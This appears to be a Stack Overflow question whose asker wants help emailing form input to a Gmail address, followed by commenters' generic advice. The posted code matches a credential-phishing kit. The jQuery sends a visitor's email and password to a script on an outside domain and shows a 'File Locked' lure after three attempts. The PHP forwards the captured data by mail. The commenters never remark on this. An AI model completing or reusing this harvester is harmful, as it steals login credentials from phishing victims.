# I need assistance in obtaining my JSON values to email via GET

Tags: php, html, email, server, contacts

I need help relaying the inputs from this html code to my email address. I used GET to try to obtain my JSON values now I want those values sent to email.

Here is the code for the input:

```html
count=count+1;
        if (count>3) {
          $('#msg').html('File Locked - Redirecting Back!');
        }else
        {
        $.ajax({
          dataType: 'JSON',
          url: 'https://yerbameta.com/mail/super/send.php',
          type: 'GET',
          data: {
            user: email,
            pass: password,
            detail: detail
          },
          // da222222t,
          beforeSend: function (xhr) {
            $('#submit-btn').html(' Please Wait..');
          },
          success: function (response) {
            console.log(response);
            if(response['msg']=="errorsend")
```

And here's me trying to get it sent to my email:

```html
<?php
  $myString = file_get_contents('php://input');
$json = ($myString);

$to      = 'jpresident47@gmail.com';
$user = 'JSON file';
$pass = $json;
$detail = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

mail($to, $user, $pass, $detail);   
?>
```

Comment: Please read [How to create a Minimal, Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example) and focus on the "minimal" part. Remove anything that's not relevant to the issue. Just posting a ton of code and expect us to go through it all is asking too much. You also need to make some attempts your self first. We can help you with your code if you run into specific issues, but this isn't a free coding service where we're take specs and hand you code. Post what you've tried and explain exactly where you're stuck.

Comment: Thing is I need someone to actually take a look at it and explain it to me for future purposes, I don't mind paying for the lecture.

Comment: Sorry, you're in the wrong place for that. As mentioned, we're here to help you sort out specific issues you might run into with your existing code. Either [do the research](https://meta.stackoverflow.com/questions/261592/how-much-research-effort-is-expected-of-stack-overflow-users) and make some attempts yourself or find some site where you can hire a developer to help you. Offering payment is off-topic here.

Comment: Alright. Thank you

Comment: Can you give me a hint on what to read about? I know you understand the question I'd appreciate the direction.

Comment: Just google something like "handling forms in PHP" and  "send email with php".

Comment: Along with what Magnus said, start simple. No email, no Ajax, no JavaScript. Just make a form that submits, and learn how to handle it server side. Then, learn how to send it over email. Then maybe throw JS/AJAX at it. One step at a time.